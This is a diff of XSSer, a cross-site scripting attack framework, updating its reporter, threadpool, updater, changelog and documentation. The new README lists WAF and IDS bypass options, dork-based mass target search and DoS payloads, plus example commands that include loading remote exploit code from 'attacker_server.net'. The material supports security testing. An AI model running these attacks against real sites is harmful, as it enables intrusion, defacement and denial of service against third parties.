+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                elif h[2] == 'hashing check':
+                    if not h[4]:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                else:
+                    if h[4]:
+                        if h[2] == "XSA":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                    else:
+                        if h[2] == "XSA": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                msg.text = msg.text + "="*75 + "\n\n"
         tree = ET.ElementTree(root)
         tree.write(filename)
-

xsser/core/randomip.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/reporter.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/threadpool.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -121,19 +119,31 @@ def makeRequests(callable_, args_list, callback=None,
     """
     requests = []
     for item in args_list:
+        is_crawling = False
+        try:
+            psy = item[3] # black magic!
+            is_crawling = True
+        except:
+            is_crawling = False
+
         if isinstance(item, tuple):
             requests.append(
                 WorkRequest(callable_, item[0], item[1], callback=callback,
                     exc_callback=exc_callback)
             )
         else:
-            requests.append(
-                WorkRequest(callable_, item, None, callback=callback,
-                    exc_callback=exc_callback)
-            )
+            if is_crawling == True:
+                requests.append(
+                    WorkRequest(callable_, [item], None, callback=callback,
+                        exc_callback=exc_callback)
+                )
+            else:
+                requests.append(
+                    WorkRequest(callable_, item, None, callback=callback,
+                        exc_callback=exc_callback)
+                )
     return requests
 
-
 # classes
 class WorkerThread(threading.Thread):
     """Background thread connected to the requests/results queues.

xsser/core/tokenhub.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/twsupport.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/update.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -28,17 +28,20 @@ class Updater(object):
     Update XSSer automatically from a .git repository
     """     
     def __init__(self):
-        GIT_REPOSITORY = "https://github.com/epsylon/xsser"
-        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '../../', ''))
+        GIT_REPOSITORY = "https://code.03c8.net/epsylon/xsser"
+        GIT_REPOSITORY2 = "https://github.com/epsylon/xsser"
+        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
         if not os.path.exists(os.path.join(rootDir, ".git")):
-            print "Not any .git repository found!\n"
+            print "[Error] Not any .git repository found!\n"
             print "="*30
             print "\nTo have working this feature, you should clone XSSer with:\n"
-            print "$ git clone %s" % GIT_REPOSITORY, "\n"
+            print "$ git clone %s" % GIT_REPOSITORY
+            print "\nAlso you can try this other mirror:\n"
+            print "$ git clone %s" % GIT_REPOSITORY2 + "\n"
         else:
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             print checkout
             if not "Already up-to-date" in checkout:
-                print "Congratulations!! XSSer has been updated... ;-)"
+                print "Congratulations!! XSSer has been updated... ;-)\n"
             else:
-                print "Your XSSer doesn't need to be updated... ;-)"
+                print "Your XSSer doesn't need to be updated... ;-)\n"

doc/AUTHOR

@@ -0,0 +1,41 @@
+========================
+
+ nick: psy (epsylon)
+  
+  <epsylon@riseup.net> 
+
+ web: https://03c8.net
+
+=======================
+
+ code:
+
+  https://code.03c8.net/epsylon
+
+=======================
+
+ software/projects:
+
+ - AnonTwi: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
+ - Bordercheck: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
+ - CIntruder: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
+ - Collatz: Tool to simulate the Collatz's conjeture.
+ - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
+ - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
+ - Goldbach: Tool to simulate the Goldbach's conjeture.
+ - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network.
+ - Orb: Tool for massive footprinting.
+ - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
+ - Propagare: Tool for extraction, organization and semantic analysis of newspapers.
+ - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
+ - PyDog4Apache: Tool to sneak logs from Apache web server.
+ - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
+ - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+=======================
+
+ BTC: 
+
+  19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
+
+========================

xsser/doc/CHANGELOG

@@ -1,7 +1,26 @@
 ================================================================
-Changelog: XSSer v1.7.2 (xsser.03c8.net)
+Changelog: XSSer v1.8.1 (https://xsser.03c8.net)
 ==============================
 
+=================
+September 20, 2019:
+=================
+
+- Re-factorized: Main(), Hashers, Payloaders, Reporters, Exporters...
+- Removed: deprecated features
+- Removed: --no-head (from default)
+- Added: new options: --check-tor, --auto-set, --auto-info and --auto-random
+- Added: new search engines: duck, startpage
+- Added: new dorks (Total: 40)
+- Added: Anti-antiXSS Firewall rules (Bypassers provided for: Firefox, IE, Opera, Chrome)
+- Modified/Updated: DCP (Data Control Protocol) method
+- Modified/Updated: HTTPrs (HTTP Response Splitting) injections
+- Modified/Updated: GTK+
+- Modified/Updated: Crawler/Spidering
+- Updated: "Extra Attacks" (XSA, XSR, COOKIE)
+- Updated: Automatic XSS vectors list (Total: 1326 = XSS: 1293 + DCP: 16 + DOM: 6 + HTTPsr: 11)
+- Updated: XSSer tool updater
+- Updated: Documentation
 
 =================
 April 12, 2018:
@@ -107,8 +126,8 @@ September 22, 2010:
 - New dorker engines (total 10) 
 - Core clean 
 - Bugfixing 
-- Social Networking auto-publisher -
-- Started -federated- XSS (full disclosure) pentesting botnet.
+- Social Networking auto-publisher
+- Started -federated- XSS (full disclosure) pentesting botnet
 
     http://identi.ca/xsserbot01
     http://twitter.com/xsserbot01
@@ -125,7 +144,7 @@ August 20, 2010:
 - Post-processing payloading 
 - DOM Shadows! 
 - Cookie injector 
-- Browser DoS (Denegation of Service).
+- Browser DoS (Denegation of Service)
 
 =================
 July 1, 2010:
@@ -133,29 +152,29 @@ July 1, 2010:
 
 - Dorking 
 - Crawling 
-- IP DWORD + Core clean.
+- IP DWORD + Core clean
 
 =================
 April 19, 2010:
 =================
 
-- HTTPS implemented + patched bugs.
+- HTTPS implemented + patched bugs
 
 =================
 March 22, 2010:
 =================
 
-- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer.
+- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer
 
 =================
 March 18, 2010:
 =================
 
-- Added attack payloads to fuzzer (62 different XSS injections).
+- Added attack payloads to fuzzer (62 different XSS injections)
 
 =================
 March 16, 2010:
 =================
 
-- Added new payload encoders to bypass filters.
+- Added new payload encoders to bypass filters
 

xsser/doc/INSTALL

@@ -1,11 +1,23 @@
 ============================================
-XSSer - Cross Site Scripter - 2011/2018
+Introduction:
 ============================================
 
 Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
 
-===================
-How-to INSTALL:
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
++ INSTALL: AUTO
+==================
+
+  sudo python setup.py install
+
+================================================================
++ INSTALL: MANUAL
 ===================
 
 XSSer runs on many platforms. It requires Python and the following libraries:
@@ -30,19 +42,5 @@ On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... als
        * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
        * PyGeoIP: https://pypi.python.org/pypi/GeoIP
 
-=========
-
-Please report any problems you encounter using/installing XSSer to the xsser-users mailing-list:
-
-    - xsser-users@lists.sourceforge.net
-
-Or write directly to:
-
-    - epsylon@riseup.net
-
-Website: 
-
-    - https://xsser.03c8.net
-
-=========
+================================================================
 

xsser/doc/MANIFESTO

@@ -6,6 +6,6 @@ The Mosquito or Mosquito alarm (marketed as the Beethoven in France and the Swis
 
 The device is marketed as a safety and security tool for preventing youths from congregating in specific areas. As such, it is promoted to reduce anti-social behaviour such as loitering, graffiti, vandalism, drug use, drug distribution, and violence. In the UK, over 3,000 have been sold, mainly for use outside shops and near transport hubs. The device is also sold in Australia, France, Denmark, Italy, Germany, Switzerland, Canada and the USA. 
 
+====================================
 The code doesn't obey the system!
-
-BBZzzzzzzzZZZZZZZZzzzz....
+====================================

doc/README

@@ -0,0 +1,350 @@
+================================================================
+Introduction:
+==============================
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
+
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
+Options and features:
+==============================
+ 
+Usage: 
+
+xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
+[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and
+report XSS vulnerabilities in web-based applications.
+
+Options:
+  --version             show program's version number and exit
+  -h, --help            show this help message and exit
+  -s, --statistics      show advanced statistics output results
+  -v, --verbose         active verbose mode output results
+  --gtk                 launch XSSer GTK Interface
+  --wizard              start Wizard Helper!
+
+  *Special Features*:
+    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
+    code embedded. XST allows you to discover if target is vulnerable to
+    'Cross Site Tracing' [CAPEC-107]:
+
+    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
+    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
+    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
+
+  *Select Target(s)*:
+    At least one of these options must to be specified to set the source
+    to get target(s) urls from:
+
+    --all=TARGET        Automatically audit an entire target
+    -u URL, --url=URL   Enter target to audit
+    -i READFILE         Read target(s) urls from file
+    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
+    -l                  Search from a list of 'dorks'
+    --De=DORK_ENGINE    Use this search engine (default: yahoo)
+    --Da                Search massively using all search engines
+
+  *Select type of HTTP/HTTPS Connection(s)*:
+    These options can be used to specify which parameter(s) we want to use
+    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
+    inject:
+
+    -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
+    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
+    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
+    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
+    --Cl                Crawl only local target(s) urls (default: FALSE)
+
+  *Configure Request(s)*:
+    These options can be used to specify how to connect to the target(s)
+    payload(s). You can choose multiple:
+
+    --head              Send a HEAD request before start a test
+    --cookie=COOKIE     Change your HTTP Cookie header
+    --drop-cookie       Ignore Set-Cookie header from response
+    --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
+    --referer=REFERER   Use another HTTP Referer header (default: NONE)
+    --xforw             Set your HTTP X-Forwarded-For with random IP values
+    --xclient           Set your HTTP X-Client-IP with random IP values
+    --headers=HEADERS   Extra HTTP headers newline separated
+    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
+    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
+    --check-tor         Check to see if Tor is used properly
+    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
+    --ignore-proxy      Ignore system default HTTP proxy
+    --timeout=TIMEOUT   Select your timeout (default: 30)
+    --retries=RETRIES   Retries when connection timeout (default: 1)
+    --threads=THREADS   Maximum number of concurrent requests (default: 5)
+    --delay=DELAY       Delay in seconds between each request (default: 0)
+    --tcp-nodelay       Use the TCP_NODELAY option
+    --follow-redirects  Follow server redirection responses (302)
+    --follow-limit=FLI  Set limit for redirection requests (default: 50)
+
+  *Checker Systems*:
+    These options are useful to know if your target is using filters
+    against XSS attacks:
+
+    --hash              Send a hash to check if target is repeating content
+    --heuristic         Discover parameters filtered by using heuristics
+    --discode=DISCODE   Set code on reply to discard an injection
+    --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
+    --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
+    --checkatdata=ALD   Check reply using: <alternative payload>
+    --reverse-check     Establish a reverse connection from target to XSSer
+    --reverse-open      Open a web browser when a reverse check is established
+
+  *Select Vector(s)*:
+    These options can be used to specify injection(s) code. Important if
+    you don't want to inject a common XSS vector used by default. Choose
+    only one option:
+
+    --payload=SCRIPT    OWN   - Inject your own code
+    --auto              AUTO  - Inject a list of vectors provided by XSSer
+
+  *Select Payload(s)*:
+    These options can be used to set the list of vectors provided by
+    XSSer. Choose only if required:
+
+    --auto-set=FZZ_NUM  ASET  - Limit of vectors to inject (default: 1293)
+    --auto-info         AINFO - Select ONLY vectors with INFO (defaul: FALSE)
+    --auto-random       ARAND - Set random to order (default: FALSE)
+
+  *Anti-antiXSS Firewall rules*:
+    These options can be used to try to bypass specific WAF/IDS products
+    and some anti-XSS browser filters. Choose only if required:
+
+    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
+    --Phpids0.7         PHPIDS (0.7) [ALL]
+    --Imperva           Imperva Incapsula [ALL]
+    --Webknight         WebKnight (4.1) [Chrome]
+    --F5bigip           F5 Big IP [Chrome + FF + Opera]
+    --Barracuda         Barracuda WAF [ALL]
+    --Modsec            Mod-Security [ALL]
+    --Quickdefense      QuickDefense [Chrome]
+    --Firefox           Firefox 12 [& below]
+    --Chrome            Chrome 19 & Firefox 12 [& below]
+    --Opera             Opera 10.5 [& below]
+    --Iexplorer         IExplorer 9 & Firefox 12 [& below]
+
+  *Select Bypasser(s)*:
+    These options can be used to encode vector(s) and try to bypass
+    possible anti-XSS filters. They can be combined with other techniques:
+
+    --Str               Use method String.FromCharCode()
+    --Une               Use Unescape() function
+    --Mix               Mix String.FromCharCode() and Unescape()
+    --Dec               Use Decimal encoding
+    --Hex               Use Hexadecimal encoding
+    --Hes               Use Hexadecimal encoding with semicolons
+    --Dwo               Encode IP addresses with DWORD
+    --Doo               Encode IP addresses with Octal
+    --Cem=CEM           Set different 'Character Encoding Mutations'
+                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
+
+  *Special Technique(s)*:
+    These options can be used to inject code using different XSS
+    techniques and fuzzing vectors. You can choose multiple:
+
+    --Coo               COO - Cross Site Scripting Cookie injection
+    --Xsa               XSA - Cross Site Agent Scripting
+    --Xsr               XSR - Cross Site Referer Scripting
+    --Dcp               DCP - Data Control Protocol injections
+    --Dom               DOM - Document Object Model injections
+    --Ind               IND - HTTP Response Splitting Induced code
+
+  *Select Final injection(s)*:
+    These options can be used to specify the final code to inject on
+    vulnerable target(s). Important if you want to exploit 'on-the-wild'
+    the vulnerabilities found. Choose only one option:
+
+    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
+    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
+
+  *Special Final injection(s)*:
+    These options can be used to execute some 'special' injection(s) on
+    vulnerable target(s). You can select multiple and combine them with
+    your final code (except with DCP exploits):
+
+    --Anchor            ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)
+    --B64               B64  - Base64 code encoding in META tag (rfc2397)
+    --Onm               ONM  - Use onMouseMove() event
+    --Ifr               IFR  - Use <iframe> source tag
+    --Dos               DOS  - XSS (client) Denial of Service
+    --Doss              DOSs - XSS (server) Denial of Service
+
+  *Reporting*:
+    --save              Export to file (XSSreport.raw)
+    --xml=FILEXML       Export to XML (--xml file.xml)
+
+  *Miscellaneous*:
+    --silent            Inhibit console output results
+    --alive=ISALIVE     Set limit of errors before check if target is alive
+    --update            Check for latest stable version
+
+================================================================
+Commands and examples:
+==============================
+
+---------------------------------------
+
+* View HELP (Available commands):
+ 
+  xsser -h (--help)
+
+----------------------------------------
+
+* Check for latest stable version:
+
+  xsser --update
+
+----------------------------------------
+
+* Launch GTK interface (GUI):
+
+  xsser --gtk
+
+----------------------------------------
+
+* Simple injection from URL:<br><br>
+
+  xsser -u "https://target.com/XSS"
+
+----------------------------------------
+
+* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers
+
+  xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:
+
+  xsser -u "https:/target.com/XSS" --auto --reverse-check -s
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):
+
+  xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
+
+  xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"
+
+----------------------------------------
+
+* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:
+
+  xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une
+
+----------------------------------------
+
+* Injection from Dork, selecting "DuckDuckGo" as search engine:
+
+  xsser --De "duck" -d "search.php?q="
+
+----------------------------------------
+
+* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):
+
+  xsser -l --Da 
+
+----------------------------------------
+
+* Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):
+
+  xsser -c 200 --Cw=2 -u "https://target.com"
+
+----------------------------------------
+
+* Simple injection from URL, to a POST parameter (ex: password), with statistics results:
+
+  xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s
+
+----------------------------------------
+
+* Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:
+
+  xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto
+
+----------------------------------------
+
+* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Dom --Fp="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos
+
+----------------------------------------
+
+* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): 
+
+  xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose 
+
+----------------------------------------
+
+* Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>
+
+  xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Report dorking search (using all search engines) to a XML file:
+
+  xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml" 
+
+----------------------------------------
+
+* Create a malicious Flash movie :
+
+  xsser --fla "INFECTED_movie.swf"
+
+----------------------------------------
+
+* Send a pre-checking hash to search for false -false positives-:
+
+  xsser -u "https://target.com" --hash
+
+----------------------------------------
+
+* Discover parameters filtered on your target using heuristics:
+
+  xsser -u "https://target.com" --heuristic
+
+----------------------------------------
+
+* Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64
+
+----------------------------------------
+
+* Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>
+
+----------------------------------------
+
+* Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:
+
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v
+
+----------------------------------------
+
+* Search also "XSSer" on the Internet for more videos and tutorials...
+
+  [...]
+

xsser/gtk/docs/about.txt

@@ -4,7 +4,7 @@
                                                                     `.`                   ..              
             Welcome to XSSer ....                       `-:`              .-`               
                                                                         `/-     -      +`                                        
-                                                                          o     +      /                                  v1.7.2b -> ZiKA-47 Swarm!
+                                                                          o     +      /                                  v1.8[1] -> "The Hive!"
                                                                           ./   -Ny    /.                                         
                                                              `::-`       :--yMN:--.      `.....                      
                                          `mMMMMMmdhysoooosMyoo+oyhdmNMMMMMMMs       
@@ -16,7 +16,7 @@
                                                                   .::`     h`  o-  o.    :+.                       
                        GPLv3                                .--.        :o      y       :/.          
                                                                ``            h      .s         -:.        
-                                                                              :/       o.          ``                2011/2018 - by psy
+                                                                              :/       o.          ``                2010/2019 - by psy
                                                                             .o         o                   
                                                                              o          ./                  
                                                                             +`           :.                 
@@ -53,22 +53,25 @@
       Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities 
       in web-based applications.
 
-      It contains several options to try to bypass certain filters, and various special techniques of code injection.
+      It provides several options to try to bypass certain filters and various special techniques for code injection.
 
       ----------
 
-      XSSer contains 'exploits' for this browsers:
-
-        - [Chrome]: Google Chrome.
-        - [IE9.0]: Internet Explorer 9.0. 
-        - [IE8.0]: Internet Explorer 8.0.
-        - [IE7.0]: Internet Explorer 7.0. 
-        - [IE6.0]: Internet Explorer 6.0.
-        - [NS8.1-IE]: Netscape 8.1+ in IE rendering engine mode. 
-        - [NS8.1-G]: Netscape 8.1+ in the Gecko rendering engine mode.
-        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel. 
-        - [Opera]: Opera. 
-        - [NS4]: Netscape 4.0.
+      XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs:
+
+        - [PHPIDS]: PHP-IDS
+        - [Imperva]: Imperva Incapsula WAF
+        - [WebKnight]: WebKnight WAF
+        - [F5]: F5 Big IP WAF
+        - [Barracuda]: Barracuda WAF
+        - [ModSec]: Mod-Security
+        - [QuickDF]: QuickDefense
+        - [Chrome]: Google Chrome
+        - [IE]: Internet Explorer
+        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel
+        - [NS-IE]: Netscape in IE rendering engine mode   
+        - [NS-G]: Netscape in the Gecko rendering engine mode
+        - [Opera]: Opera
 
     ====================================
     Documentation:
@@ -102,6 +105,7 @@
 
       You can also clone the latest development version from the XSSer repository:
 
+            $ git clone https://code.03c8.net/epsylon/xsser
             $ git clone https://github.com/epsylon/xsser
 
       For more details, check the main website: 
@@ -124,5 +128,5 @@
     Community:
     ===================
 
-      You can join #xsser community on: irc.freenode.net
+      You can FREE JOIN! #xsser community on: irc.freenode.net
 

gtk/docs/wizard0.txt

@@ -0,0 +1,16 @@
+         
+         
+          
+    ==========
+
+    Welcome to the Wizard Helper!
+
+
+    You only need to reply some questions to create your pentesting. If you haven't time to read, just press "Next". :-)
+
+    XSSer will take your answers to -automagically- build commands.
+
+
+    Press "Start Wizard" button (below) to begin with your configuration...
+
+    ==========

xsser/gtk/docs/wizard1.txt

@@ -3,10 +3,10 @@
 
     ==========
 
-    OK!, so now is time to -fly your mosquito(es)-. You need to set some parameters: 
